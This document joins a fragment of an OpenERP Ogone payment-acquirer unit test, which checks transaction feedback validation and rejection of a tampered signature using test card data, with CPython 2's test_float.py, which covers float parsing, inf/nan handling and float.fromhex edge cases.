# typical data posted by ogone after client has successfully paid
ogone_post_data = {
'orderID': u'test_ref_2',
'STATUS': u'9',
'CARDNO': u'XXXXXXXXXXXX0002',
'PAYID': u'25381582',
'CN': u'Norbert Buyer',
'NCERROR': u'0',
'TRXDATE': u'11/15/13',
'IP': u'85.201.233.72',
'BRAND': u'VISA',
'ACCEPTANCE': u'test123',
'currency': u'EUR',
'amount': u'1.95',
'SHASIGN': u'7B7B0ED9CBC4A85543A9073374589033A62A05A5',
'ED': u'0315',
'PM': u'CreditCard'
}
# should raise error about unknown tx
with self.assertRaises(ValidationError):
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# create tx
tx_id = self.payment_transaction.create(
cr, uid, {
'amount': 1.95,
'acquirer_id': self.ogone_id,
'currency_id': self.currency_euro_id,
'reference': 'test_ref_2',
'partner_name': 'Norbert Buyer',
'partner_country_id': self.country_france_id,
}, context=context
)
# validate it
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# check state
tx = self.payment_transaction.browse(cr, uid, tx_id, context=context)
self.assertEqual(tx.state, 'done', 'ogone: validation did not put tx into done state')
self.assertEqual(tx.ogone_payid, ogone_post_data.get('PAYID'), 'ogone: validation did not update tx payid')
# reset tx
tx.write({'state': 'draft', 'date_validate': False, 'ogone_payid': False})
# now ogone post is ok: try to modify the SHASIGN
ogone_post_data['SHASIGN'] = 'a4c16bae286317b82edb49188d3399249a784691'
with self.assertRaises(ValidationError):
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# simulate an error
ogone_post_data['STATUS'] = 2
ogone_post_data['SHASIGN'] = 'a4c16bae286317b82edb49188d3399249a784691'
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# check state
tx = self.payment_transaction.browse(cr, uid, tx_id, context=context)
self.assertEqual(tx.state, 'error', 'ogone: erroneous validation did not put tx into error state')
def test_30_ogone_s2s(self):
test_ref = 'test_ref_%.15f' % time.time()
cr, uid, context = self.cr, self.uid, {}
        # be sure not to do anything stupid
ogone = self.payment_acquirer.browse(self.cr, self.uid, self.ogone_id, None)
self.assertEqual(ogone.environment, 'test', 'test without test environment')
# create a new draft tx
tx_id = self.payment_transaction.create(
cr, uid, {
'amount': 0.01,
'acquirer_id': self.ogone_id,
'currency_id': self.currency_euro_id,
'reference': test_ref,
'partner_id': self.buyer_id,
'type': 'server2server',
}, context=context
)
# create an alias
res = self.payment_transaction.ogone_s2s_create_alias(
cr, uid, tx_id, {
'expiry_date_mm': '01',
'expiry_date_yy': '2015',
'holder_name': 'Norbert Poilu',
'number': '4000000000000002',
'brand': 'VISA',
}, context=context)
# check an alias is set, containing at least OPENERP
tx = self.payment_transaction.browse(cr, uid, tx_id, context=context)
self.assertIn('OPENERP', tx.partner_reference, 'ogone: wrong partner reference after creating an alias')
res = self.payment_transaction.ogone_s2s_execute(cr, uid, tx_id, {}, context=context)
# print res
# {
# 'orderID': u'reference',
# 'STATUS': u'9',
# 'CARDNO': u'XXXXXXXXXXXX0002',
# 'PAYID': u'24998692',
# 'CN': u'Norbert Poilu',
# 'NCERROR': u'0',
# 'TRXDATE': u'11/05/13',
# 'IP': u'85.201.233.72',
# 'BRAND': u'VISA',
# 'ACCEPTANCE': u'test123',
# 'currency': u'EUR',
# 'amount': u'1.95',
# 'SHASIGN': u'EFDC56879EF7DE72CCF4B397076B5C9A844CB0FA',
# 'ED': u'0314',
# 'PM': u'CreditCard'
# }
| agpl-3.0 |
dennis-sheil/commandergenius | project/jni/python/src/Lib/test/test_float.py | 51 | 33323 |
import unittest, struct
import os
from test import test_support
import math
from math import isinf, isnan, copysign, ldexp
import operator
import random, fractions
INF = float("inf")
NAN = float("nan")
class GeneralFloatCases(unittest.TestCase):
def test_float(self):
self.assertEqual(float(3.14), 3.14)
self.assertEqual(float(314), 314.0)
self.assertEqual(float(314L), 314.0)
self.assertEqual(float(" 3.14 "), 3.14)
self.assertRaises(ValueError, float, " 0x3.1 ")
self.assertRaises(ValueError, float, " -0x3.p-1 ")
self.assertRaises(ValueError, float, " +0x3.p-1 ")
self.assertRaises(ValueError, float, "++3.14")
self.assertRaises(ValueError, float, "+-3.14")
self.assertRaises(ValueError, float, "-+3.14")
self.assertRaises(ValueError, float, "--3.14")
if test_support.have_unicode:
self.assertEqual(float(unicode(" 3.14 ")), 3.14)
self.assertEqual(float(unicode(" \u0663.\u0661\u0664 ",'raw-unicode-escape')), 3.14)
# Implementation limitation in PyFloat_FromString()
self.assertRaises(ValueError, float, unicode("1"*10000))
@test_support.run_with_locale('LC_NUMERIC', 'fr_FR', 'de_DE')
def test_float_with_comma(self):
# set locale to something that doesn't use '.' for the decimal point
        # float must not accept the locale-specific decimal point but
        # it still has to accept the normal Python syntax
import locale
        if locale.localeconv()['decimal_point'] != ',':
return
self.assertEqual(float(" 3.14 "), 3.14)
self.assertEqual(float("+3.14 "), 3.14)
self.assertEqual(float("-3.14 "), -3.14)
self.assertEqual(float(".14 "), .14)
self.assertEqual(float("3. "), 3.0)
self.assertEqual(float("3.e3 "), 3000.0)
self.assertEqual(float("3.2e3 "), 3200.0)
self.assertEqual(float("2.5e-1 "), 0.25)
self.assertEqual(float("5e-1"), 0.5)
self.assertRaises(ValueError, float, " 3,14 ")
self.assertRaises(ValueError, float, " +3,14 ")
self.assertRaises(ValueError, float, " -3,14 ")
self.assertRaises(ValueError, float, " 0x3.1 ")
self.assertRaises(ValueError, float, " -0x3.p-1 ")
self.assertRaises(ValueError, float, " +0x3.p-1 ")
self.assertEqual(float(" 25.e-1 "), 2.5)
self.assertEqual(test_support.fcmp(float(" .25e-1 "), .025), 0)
def test_floatconversion(self):
# Make sure that calls to __float__() work properly
class Foo0:
def __float__(self):
return 42.
class Foo1(object):
def __float__(self):
return 42.
class Foo2(float):
def __float__(self):
return 42.
class Foo3(float):
def __new__(cls, value=0.):
return float.__new__(cls, 2*value)
def __float__(self):
return self
class Foo4(float):
def __float__(self):
return 42
self.assertAlmostEqual(float(Foo0()), 42.)
self.assertAlmostEqual(float(Foo1()), 42.)
self.assertAlmostEqual(float(Foo2()), 42.)
self.assertAlmostEqual(float(Foo3(21)), 42.)
self.assertRaises(TypeError, float, Foo4(42))
def test_floatasratio(self):
for f, ratio in [
(0.875, (7, 8)),
(-0.875, (-7, 8)),
(0.0, (0, 1)),
(11.5, (23, 2)),
]:
self.assertEqual(f.as_integer_ratio(), ratio)
for i in range(10000):
f = random.random()
f *= 10 ** random.randint(-100, 100)
n, d = f.as_integer_ratio()
self.assertEqual(float(n).__truediv__(d), f)
R = fractions.Fraction
self.assertEqual(R(0, 1),
R(*float(0.0).as_integer_ratio()))
self.assertEqual(R(5, 2),
R(*float(2.5).as_integer_ratio()))
self.assertEqual(R(1, 2),
R(*float(0.5).as_integer_ratio()))
self.assertEqual(R(4728779608739021, 2251799813685248),
R(*float(2.1).as_integer_ratio()))
self.assertEqual(R(-4728779608739021, 2251799813685248),
R(*float(-2.1).as_integer_ratio()))
self.assertEqual(R(-2100, 1),
R(*float(-2100.0).as_integer_ratio()))
self.assertRaises(OverflowError, float('inf').as_integer_ratio)
self.assertRaises(OverflowError, float('-inf').as_integer_ratio)
self.assertRaises(ValueError, float('nan').as_integer_ratio)
class FormatFunctionsTestCase(unittest.TestCase):
def setUp(self):
self.save_formats = {'double':float.__getformat__('double'),
'float':float.__getformat__('float')}
def tearDown(self):
float.__setformat__('double', self.save_formats['double'])
float.__setformat__('float', self.save_formats['float'])
def test_getformat(self):
self.assert_(float.__getformat__('double') in
['unknown', 'IEEE, big-endian', 'IEEE, little-endian'])
self.assert_(float.__getformat__('float') in
['unknown', 'IEEE, big-endian', 'IEEE, little-endian'])
self.assertRaises(ValueError, float.__getformat__, 'chicken')
self.assertRaises(TypeError, float.__getformat__, 1)
def test_setformat(self):
for t in 'double', 'float':
float.__setformat__(t, 'unknown')
if self.save_formats[t] == 'IEEE, big-endian':
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, little-endian')
elif self.save_formats[t] == 'IEEE, little-endian':
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, big-endian')
else:
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, big-endian')
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, little-endian')
self.assertRaises(ValueError, float.__setformat__,
t, 'chicken')
self.assertRaises(ValueError, float.__setformat__,
'chicken', 'unknown')
BE_DOUBLE_INF = '\x7f\xf0\x00\x00\x00\x00\x00\x00'
LE_DOUBLE_INF = ''.join(reversed(BE_DOUBLE_INF))
BE_DOUBLE_NAN = '\x7f\xf8\x00\x00\x00\x00\x00\x00'
LE_DOUBLE_NAN = ''.join(reversed(BE_DOUBLE_NAN))
BE_FLOAT_INF = '\x7f\x80\x00\x00'
LE_FLOAT_INF = ''.join(reversed(BE_FLOAT_INF))
BE_FLOAT_NAN = '\x7f\xc0\x00\x00'
LE_FLOAT_NAN = ''.join(reversed(BE_FLOAT_NAN))
# on non-IEEE platforms, attempting to unpack a bit pattern
# representing an infinity or a NaN should raise an exception.
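# For instance, struct.unpack('>d', BE_DOUBLE_INF) is then expected to raise
# ValueError, which is what the tests below assert.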
class UnknownFormatTestCase(unittest.TestCase):
def setUp(self):
self.save_formats = {'double':float.__getformat__('double'),
'float':float.__getformat__('float')}
float.__setformat__('double', 'unknown')
float.__setformat__('float', 'unknown')
def tearDown(self):
float.__setformat__('double', self.save_formats['double'])
float.__setformat__('float', self.save_formats['float'])
def test_double_specials_dont_unpack(self):
for fmt, data in [('>d', BE_DOUBLE_INF),
('>d', BE_DOUBLE_NAN),
('<d', LE_DOUBLE_INF),
('<d', LE_DOUBLE_NAN)]:
self.assertRaises(ValueError, struct.unpack, fmt, data)
def test_float_specials_dont_unpack(self):
for fmt, data in [('>f', BE_FLOAT_INF),
('>f', BE_FLOAT_NAN),
('<f', LE_FLOAT_INF),
('<f', LE_FLOAT_NAN)]:
self.assertRaises(ValueError, struct.unpack, fmt, data)
# on an IEEE platform, all we guarantee is that bit patterns
# representing infinities or NaNs do not raise an exception; all else
# is accident (today).
# let's also try to guarantee that -0.0 and 0.0 don't get confused.
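# A quick illustrative sketch of that distinction (values from CPython):
#     >>> import math
#     >>> math.atan2(0.0, -1), math.atan2(-0.0, -1)
#     (3.141592653589793, -3.141592653589793)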
class IEEEFormatTestCase(unittest.TestCase):
if float.__getformat__("double").startswith("IEEE"):
def test_double_specials_do_unpack(self):
for fmt, data in [('>d', BE_DOUBLE_INF),
('>d', BE_DOUBLE_NAN),
('<d', LE_DOUBLE_INF),
('<d', LE_DOUBLE_NAN)]:
struct.unpack(fmt, data)
if float.__getformat__("float").startswith("IEEE"):
def test_float_specials_do_unpack(self):
for fmt, data in [('>f', BE_FLOAT_INF),
('>f', BE_FLOAT_NAN),
('<f', LE_FLOAT_INF),
('<f', LE_FLOAT_NAN)]:
struct.unpack(fmt, data)
if float.__getformat__("double").startswith("IEEE"):
def test_negative_zero(self):
import math
def pos_pos():
return 0.0, math.atan2(0.0, -1)
def pos_neg():
return 0.0, math.atan2(-0.0, -1)
def neg_pos():
return -0.0, math.atan2(0.0, -1)
def neg_neg():
return -0.0, math.atan2(-0.0, -1)
self.assertEquals(pos_pos(), neg_pos())
self.assertEquals(pos_neg(), neg_neg())
if float.__getformat__("double").startswith("IEEE"):
def test_underflow_sign(self):
import math
# check that -1e-1000 gives -0.0, not 0.0
self.assertEquals(math.atan2(-1e-1000, -1), math.atan2(-0.0, -1))
self.assertEquals(math.atan2(float('-1e-1000'), -1),
math.atan2(-0.0, -1))
class ReprTestCase(unittest.TestCase):
def test_repr(self):
floats_file = open(os.path.join(os.path.split(__file__)[0],
'floating_points.txt'))
for line in floats_file:
line = line.strip()
if not line or line.startswith('#'):
continue
v = eval(line)
self.assertEqual(v, eval(repr(v)))
floats_file.close()
# Beginning with Python 2.6 float has cross platform compatible
# ways to create and represent inf and nan
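# An illustrative sketch of those spellings (Python 2.6+):
#     >>> float('inf'), float('-Infinity')
#     (inf, -inf)
#     >>> repr(float('nan'))
#     'nan'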
class InfNanTest(unittest.TestCase):
def test_inf_from_str(self):
self.assert_(isinf(float("inf")))
self.assert_(isinf(float("+inf")))
self.assert_(isinf(float("-inf")))
self.assert_(isinf(float("infinity")))
self.assert_(isinf(float("+infinity")))
self.assert_(isinf(float("-infinity")))
self.assertEqual(repr(float("inf")), "inf")
self.assertEqual(repr(float("+inf")), "inf")
self.assertEqual(repr(float("-inf")), "-inf")
self.assertEqual(repr(float("infinity")), "inf")
self.assertEqual(repr(float("+infinity")), "inf")
self.assertEqual(repr(float("-infinity")), "-inf")
self.assertEqual(repr(float("INF")), "inf")
self.assertEqual(repr(float("+Inf")), "inf")
self.assertEqual(repr(float("-iNF")), "-inf")
self.assertEqual(repr(float("Infinity")), "inf")
self.assertEqual(repr(float("+iNfInItY")), "inf")
self.assertEqual(repr(float("-INFINITY")), "-inf")
self.assertEqual(str(float("inf")), "inf")
self.assertEqual(str(float("+inf")), "inf")
self.assertEqual(str(float("-inf")), "-inf")
self.assertEqual(str(float("infinity")), "inf")
self.assertEqual(str(float("+infinity")), "inf")
self.assertEqual(str(float("-infinity")), "-inf")
self.assertRaises(ValueError, float, "info")
self.assertRaises(ValueError, float, "+info")
self.assertRaises(ValueError, float, "-info")
self.assertRaises(ValueError, float, "in")
self.assertRaises(ValueError, float, "+in")
self.assertRaises(ValueError, float, "-in")
self.assertRaises(ValueError, float, "infinit")
self.assertRaises(ValueError, float, "+Infin")
self.assertRaises(ValueError, float, "-INFI")
self.assertRaises(ValueError, float, "infinitys")
def test_inf_as_str(self):
self.assertEqual(repr(1e300 * 1e300), "inf")
self.assertEqual(repr(-1e300 * 1e300), "-inf")
self.assertEqual(str(1e300 * 1e300), "inf")
self.assertEqual(str(-1e300 * 1e300), "-inf")
def test_nan_from_str(self):
self.assert_(isnan(float("nan")))
self.assert_(isnan(float("+nan")))
self.assert_(isnan(float("-nan")))
self.assertEqual(repr(float("nan")), "nan")
self.assertEqual(repr(float("+nan")), "nan")
self.assertEqual(repr(float("-nan")), "nan")
self.assertEqual(repr(float("NAN")), "nan")
self.assertEqual(repr(float("+NAn")), "nan")
self.assertEqual(repr(float("-NaN")), "nan")
self.assertEqual(str(float("nan")), "nan")
self.assertEqual(str(float("+nan")), "nan")
self.assertEqual(str(float("-nan")), "nan")
self.assertRaises(ValueError, float, "nana")
self.assertRaises(ValueError, float, "+nana")
self.assertRaises(ValueError, float, "-nana")
self.assertRaises(ValueError, float, "na")
self.assertRaises(ValueError, float, "+na")
self.assertRaises(ValueError, float, "-na")
def test_nan_as_str(self):
self.assertEqual(repr(1e300 * 1e300 * 0), "nan")
self.assertEqual(repr(-1e300 * 1e300 * 0), "nan")
self.assertEqual(str(1e300 * 1e300 * 0), "nan")
self.assertEqual(str(-1e300 * 1e300 * 0), "nan")
def notest_float_nan(self):
self.assert_(NAN.is_nan())
self.failIf(INF.is_nan())
self.failIf((0.).is_nan())
def notest_float_inf(self):
self.assert_(INF.is_inf())
self.failIf(NAN.is_inf())
self.failIf((0.).is_inf())
fromHex = float.fromhex
toHex = float.hex
class HexFloatTestCase(unittest.TestCase):
MAX = fromHex('0x.fffffffffffff8p+1024') # max normal
MIN = fromHex('0x1p-1022') # min normal
TINY = fromHex('0x0.0000000000001p-1022') # min subnormal
EPS = fromHex('0x0.0000000000001p0') # diff between 1.0 and next float up
def identical(self, x, y):
# check that floats x and y are identical, or that both
# are NaNs
if isnan(x) or isnan(y):
if isnan(x) == isnan(y):
return
elif x == y and (x != 0.0 or copysign(1.0, x) == copysign(1.0, y)):
return
self.fail('%r not identical to %r' % (x, y))
def test_ends(self):
self.identical(self.MIN, ldexp(1.0, -1022))
self.identical(self.TINY, ldexp(1.0, -1074))
self.identical(self.EPS, ldexp(1.0, -52))
self.identical(self.MAX, 2.*(ldexp(1.0, 1023) - ldexp(1.0, 970)))
def test_invalid_inputs(self):
invalid_inputs = [
'infi', # misspelt infinities and nans
'-Infinit',
'++inf',
'-+Inf',
'--nan',
'+-NaN',
'snan',
'NaNs',
'nna',
'0xnan',
'',
' ',
'x1.0p0',
'0xX1.0p0',
'+ 0x1.0p0', # internal whitespace
'- 0x1.0p0',
'0 x1.0p0',
'0x 1.0p0',
'0x1 2.0p0',
'+0x1 .0p0',
'0x1. 0p0',
'-0x1.0 1p0',
'-0x1.0 p0',
'+0x1.0p +0',
'0x1.0p -0',
'0x1.0p 0',
'+0x1.0p+ 0',
'-0x1.0p- 0',
'++0x1.0p-0', # double signs
'--0x1.0p0',
'+-0x1.0p+0',
'-+0x1.0p0',
'0x1.0p++0',
'+0x1.0p+-0',
'-0x1.0p-+0',
'0x1.0p--0',
'0x1.0.p0',
'0x.p0', # no hex digits before or after point
'0x1,p0', # wrong decimal point character
'0x1pa',
u'0x1p\uff10', # fullwidth Unicode digits
u'\uff10x1p0',
u'0x\uff11p0',
u'0x1.\uff10p0',
'0x1p0 \n 0x2p0',
'0x1p0\0 0x1p0', # embedded null byte is not end of string
]
for x in invalid_inputs:
try:
result = fromHex(x)
except ValueError:
pass
else:
self.fail('Expected float.fromhex(%r) to raise ValueError; '
'got %r instead' % (x, result))
def test_from_hex(self):
        MIN = self.MIN
        MAX = self.MAX
        TINY = self.TINY
        EPS = self.EPS
# two spellings of infinity, with optional signs; case-insensitive
self.identical(fromHex('inf'), INF)
self.identical(fromHex('+Inf'), INF)
self.identical(fromHex('-INF'), -INF)
self.identical(fromHex('iNf'), INF)
self.identical(fromHex('Infinity'), INF)
self.identical(fromHex('+INFINITY'), INF)
self.identical(fromHex('-infinity'), -INF)
self.identical(fromHex('-iNFiNitY'), -INF)
# nans with optional sign; case insensitive
self.identical(fromHex('nan'), NAN)
self.identical(fromHex('+NaN'), NAN)
self.identical(fromHex('-NaN'), NAN)
self.identical(fromHex('-nAN'), NAN)
# variations in input format
self.identical(fromHex('1'), 1.0)
self.identical(fromHex('+1'), 1.0)
self.identical(fromHex('1.'), 1.0)
self.identical(fromHex('1.0'), 1.0)
self.identical(fromHex('1.0p0'), 1.0)
self.identical(fromHex('01'), 1.0)
self.identical(fromHex('01.'), 1.0)
self.identical(fromHex('0x1'), 1.0)
self.identical(fromHex('0x1.'), 1.0)
self.identical(fromHex('0x1.0'), 1.0)
self.identical(fromHex('+0x1.0'), 1.0)
self.identical(fromHex('0x1p0'), 1.0)
self.identical(fromHex('0X1p0'), 1.0)
self.identical(fromHex('0X1P0'), 1.0)
self.identical(fromHex('0x1P0'), 1.0)
self.identical(fromHex('0x1.p0'), 1.0)
self.identical(fromHex('0x1.0p0'), 1.0)
self.identical(fromHex('0x.1p4'), 1.0)
self.identical(fromHex('0x.1p04'), 1.0)
self.identical(fromHex('0x.1p004'), 1.0)
self.identical(fromHex('0x1p+0'), 1.0)
self.identical(fromHex('0x1P-0'), 1.0)
self.identical(fromHex('+0x1p0'), 1.0)
self.identical(fromHex('0x01p0'), 1.0)
self.identical(fromHex('0x1p00'), 1.0)
self.identical(fromHex(u'0x1p0'), 1.0)
self.identical(fromHex(' 0x1p0 '), 1.0)
self.identical(fromHex('\n 0x1p0'), 1.0)
self.identical(fromHex('0x1p0 \t'), 1.0)
self.identical(fromHex('0xap0'), 10.0)
self.identical(fromHex('0xAp0'), 10.0)
self.identical(fromHex('0xaP0'), 10.0)
self.identical(fromHex('0xAP0'), 10.0)
self.identical(fromHex('0xbep0'), 190.0)
self.identical(fromHex('0xBep0'), 190.0)
self.identical(fromHex('0xbEp0'), 190.0)
self.identical(fromHex('0XBE0P-4'), 190.0)
self.identical(fromHex('0xBEp0'), 190.0)
self.identical(fromHex('0xB.Ep4'), 190.0)
self.identical(fromHex('0x.BEp8'), 190.0)
self.identical(fromHex('0x.0BEp12'), 190.0)
# moving the point around
pi = fromHex('0x1.921fb54442d18p1')
self.identical(fromHex('0x.006487ed5110b46p11'), pi)
self.identical(fromHex('0x.00c90fdaa22168cp10'), pi)
self.identical(fromHex('0x.01921fb54442d18p9'), pi)
self.identical(fromHex('0x.03243f6a8885a3p8'), pi)
self.identical(fromHex('0x.06487ed5110b46p7'), pi)
self.identical(fromHex('0x.0c90fdaa22168cp6'), pi)
self.identical(fromHex('0x.1921fb54442d18p5'), pi)
self.identical(fromHex('0x.3243f6a8885a3p4'), pi)
self.identical(fromHex('0x.6487ed5110b46p3'), pi)
self.identical(fromHex('0x.c90fdaa22168cp2'), pi)
self.identical(fromHex('0x1.921fb54442d18p1'), pi)
self.identical(fromHex('0x3.243f6a8885a3p0'), pi)
self.identical(fromHex('0x6.487ed5110b46p-1'), pi)
self.identical(fromHex('0xc.90fdaa22168cp-2'), pi)
self.identical(fromHex('0x19.21fb54442d18p-3'), pi)
self.identical(fromHex('0x32.43f6a8885a3p-4'), pi)
self.identical(fromHex('0x64.87ed5110b46p-5'), pi)
self.identical(fromHex('0xc9.0fdaa22168cp-6'), pi)
self.identical(fromHex('0x192.1fb54442d18p-7'), pi)
self.identical(fromHex('0x324.3f6a8885a3p-8'), pi)
self.identical(fromHex('0x648.7ed5110b46p-9'), pi)
self.identical(fromHex('0xc90.fdaa22168cp-10'), pi)
self.identical(fromHex('0x1921.fb54442d18p-11'), pi)
# ...
self.identical(fromHex('0x1921fb54442d1.8p-47'), pi)
self.identical(fromHex('0x3243f6a8885a3p-48'), pi)
self.identical(fromHex('0x6487ed5110b46p-49'), pi)
self.identical(fromHex('0xc90fdaa22168cp-50'), pi)
self.identical(fromHex('0x1921fb54442d18p-51'), pi)
self.identical(fromHex('0x3243f6a8885a30p-52'), pi)
self.identical(fromHex('0x6487ed5110b460p-53'), pi)
self.identical(fromHex('0xc90fdaa22168c0p-54'), pi)
self.identical(fromHex('0x1921fb54442d180p-55'), pi)
# results that should overflow...
self.assertRaises(OverflowError, fromHex, '-0x1p1024')
self.assertRaises(OverflowError, fromHex, '0x1p+1025')
self.assertRaises(OverflowError, fromHex, '+0X1p1030')
self.assertRaises(OverflowError, fromHex, '-0x1p+1100')
self.assertRaises(OverflowError, fromHex, '0X1p123456789123456789')
self.assertRaises(OverflowError, fromHex, '+0X.8p+1025')
self.assertRaises(OverflowError, fromHex, '+0x0.8p1025')
self.assertRaises(OverflowError, fromHex, '-0x0.4p1026')
self.assertRaises(OverflowError, fromHex, '0X2p+1023')
self.assertRaises(OverflowError, fromHex, '0x2.p1023')
self.assertRaises(OverflowError, fromHex, '-0x2.0p+1023')
self.assertRaises(OverflowError, fromHex, '+0X4p+1022')
self.assertRaises(OverflowError, fromHex, '0x1.ffffffffffffffp+1023')
self.assertRaises(OverflowError, fromHex, '-0X1.fffffffffffff9p1023')
self.assertRaises(OverflowError, fromHex, '0X1.fffffffffffff8p1023')
self.assertRaises(OverflowError, fromHex, '+0x3.fffffffffffffp1022')
self.assertRaises(OverflowError, fromHex, '0x3fffffffffffffp+970')
self.assertRaises(OverflowError, fromHex, '0x10000000000000000p960')
self.assertRaises(OverflowError, fromHex, '-0Xffffffffffffffffp960')
# ...and those that round to +-max float
self.identical(fromHex('+0x1.fffffffffffffp+1023'), MAX)
self.identical(fromHex('-0X1.fffffffffffff7p1023'), -MAX)
self.identical(fromHex('0X1.fffffffffffff7fffffffffffffp1023'), MAX)
# zeros
self.identical(fromHex('0x0p0'), 0.0)
self.identical(fromHex('0x0p1000'), 0.0)
self.identical(fromHex('-0x0p1023'), -0.0)
self.identical(fromHex('0X0p1024'), 0.0)
self.identical(fromHex('-0x0p1025'), -0.0)
self.identical(fromHex('0X0p2000'), 0.0)
self.identical(fromHex('0x0p123456789123456789'), 0.0)
self.identical(fromHex('-0X0p-0'), -0.0)
self.identical(fromHex('-0X0p-1000'), -0.0)
self.identical(fromHex('0x0p-1023'), 0.0)
self.identical(fromHex('-0X0p-1024'), -0.0)
self.identical(fromHex('-0x0p-1025'), -0.0)
self.identical(fromHex('-0x0p-1072'), -0.0)
self.identical(fromHex('0X0p-1073'), 0.0)
self.identical(fromHex('-0x0p-1074'), -0.0)
self.identical(fromHex('0x0p-1075'), 0.0)
self.identical(fromHex('0X0p-1076'), 0.0)
self.identical(fromHex('-0X0p-2000'), -0.0)
self.identical(fromHex('-0x0p-123456789123456789'), -0.0)
# values that should underflow to 0
self.identical(fromHex('0X1p-1075'), 0.0)
self.identical(fromHex('-0X1p-1075'), -0.0)
self.identical(fromHex('-0x1p-123456789123456789'), -0.0)
self.identical(fromHex('0x1.00000000000000001p-1075'), TINY)
self.identical(fromHex('-0x1.1p-1075'), -TINY)
self.identical(fromHex('0x1.fffffffffffffffffp-1075'), TINY)
# check round-half-even is working correctly near 0 ...
self.identical(fromHex('0x1p-1076'), 0.0)
self.identical(fromHex('0X2p-1076'), 0.0)
self.identical(fromHex('0X3p-1076'), TINY)
self.identical(fromHex('0x4p-1076'), TINY)
self.identical(fromHex('0X5p-1076'), TINY)
self.identical(fromHex('0X6p-1076'), 2*TINY)
self.identical(fromHex('0x7p-1076'), 2*TINY)
self.identical(fromHex('0X8p-1076'), 2*TINY)
self.identical(fromHex('0X9p-1076'), 2*TINY)
self.identical(fromHex('0xap-1076'), 2*TINY)
self.identical(fromHex('0Xbp-1076'), 3*TINY)
self.identical(fromHex('0xcp-1076'), 3*TINY)
self.identical(fromHex('0Xdp-1076'), 3*TINY)
self.identical(fromHex('0Xep-1076'), 4*TINY)
self.identical(fromHex('0xfp-1076'), 4*TINY)
self.identical(fromHex('0x10p-1076'), 4*TINY)
self.identical(fromHex('-0x1p-1076'), -0.0)
self.identical(fromHex('-0X2p-1076'), -0.0)
self.identical(fromHex('-0x3p-1076'), -TINY)
self.identical(fromHex('-0X4p-1076'), -TINY)
self.identical(fromHex('-0x5p-1076'), -TINY)
self.identical(fromHex('-0x6p-1076'), -2*TINY)
self.identical(fromHex('-0X7p-1076'), -2*TINY)
self.identical(fromHex('-0X8p-1076'), -2*TINY)
self.identical(fromHex('-0X9p-1076'), -2*TINY)
self.identical(fromHex('-0Xap-1076'), -2*TINY)
self.identical(fromHex('-0xbp-1076'), -3*TINY)
self.identical(fromHex('-0xcp-1076'), -3*TINY)
self.identical(fromHex('-0Xdp-1076'), -3*TINY)
self.identical(fromHex('-0xep-1076'), -4*TINY)
self.identical(fromHex('-0Xfp-1076'), -4*TINY)
self.identical(fromHex('-0X10p-1076'), -4*TINY)
# ... and near MIN ...
self.identical(fromHex('0x0.ffffffffffffd6p-1022'), MIN-3*TINY)
self.identical(fromHex('0x0.ffffffffffffd8p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffdap-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffdcp-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffdep-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe0p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe2p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe4p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe6p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe8p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffeap-1022'), MIN-TINY)
self.identical(fromHex('0x0.ffffffffffffecp-1022'), MIN-TINY)
self.identical(fromHex('0x0.ffffffffffffeep-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff0p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff2p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff4p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff6p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff8p-1022'), MIN)
self.identical(fromHex('0x0.fffffffffffffap-1022'), MIN)
self.identical(fromHex('0x0.fffffffffffffcp-1022'), MIN)
self.identical(fromHex('0x0.fffffffffffffep-1022'), MIN)
self.identical(fromHex('0x1.00000000000000p-1022'), MIN)
self.identical(fromHex('0x1.00000000000002p-1022'), MIN)
self.identical(fromHex('0x1.00000000000004p-1022'), MIN)
self.identical(fromHex('0x1.00000000000006p-1022'), MIN)
self.identical(fromHex('0x1.00000000000008p-1022'), MIN)
self.identical(fromHex('0x1.0000000000000ap-1022'), MIN+TINY)
self.identical(fromHex('0x1.0000000000000cp-1022'), MIN+TINY)
self.identical(fromHex('0x1.0000000000000ep-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000010p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000012p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000014p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000016p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000018p-1022'), MIN+2*TINY)
# ... and near 1.0.
self.identical(fromHex('0x0.fffffffffffff0p0'), 1.0-EPS)
self.identical(fromHex('0x0.fffffffffffff1p0'), 1.0-EPS)
self.identical(fromHex('0X0.fffffffffffff2p0'), 1.0-EPS)
self.identical(fromHex('0x0.fffffffffffff3p0'), 1.0-EPS)
self.identical(fromHex('0X0.fffffffffffff4p0'), 1.0-EPS)
self.identical(fromHex('0X0.fffffffffffff5p0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffff6p0'), 1.0-EPS/2)
self.identical(fromHex('0x0.fffffffffffff7p0'), 1.0-EPS/2)
self.identical(fromHex('0x0.fffffffffffff8p0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffff9p0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffffap0'), 1.0-EPS/2)
self.identical(fromHex('0x0.fffffffffffffbp0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffffcp0'), 1.0)
